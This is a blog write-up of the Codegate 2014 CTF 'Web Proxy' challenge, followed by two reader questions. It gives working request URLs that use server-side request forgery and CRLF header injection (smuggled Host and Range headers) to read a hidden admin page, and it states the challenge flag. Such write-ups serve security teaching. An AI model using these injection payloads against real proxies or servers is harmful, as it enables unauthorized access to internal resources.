A disturbing lack of taste. Just another WordPress site

24Feb/145

Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php

It has a GET parameter "url":

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=google.it

It prints the headers + part of the body. We can easly enter the admin page with:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/

but since the body isn't printed we can't see all the response. After a bit of testing it pointed out that a CRLF injection was possible so we can split the body with Range: header.

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.0%0D%0AHost:%20localhost%0D%0ARange:%20bytes=372-425%0D%0AConnection:%20close%0D%0A%0D%0A

<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Since it wants Host header to be "hackme" lets do it:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N

Razor4x

Comments (5) Trackbacks (0)
  1. Hello, i dont understand about HTTP/1.0, host:localhost, range=88-127, connection:close.
    Can you tell me what is this. I tried to hack it via LFI, but it couldn’t show anything.
    P/s: sorry for my english, i’m a beginner.

  2. How do you know the web proxy server agree the website consistent with specified HTTP header “range: bytes=” ?


Leave a comment

No trackbacks yet.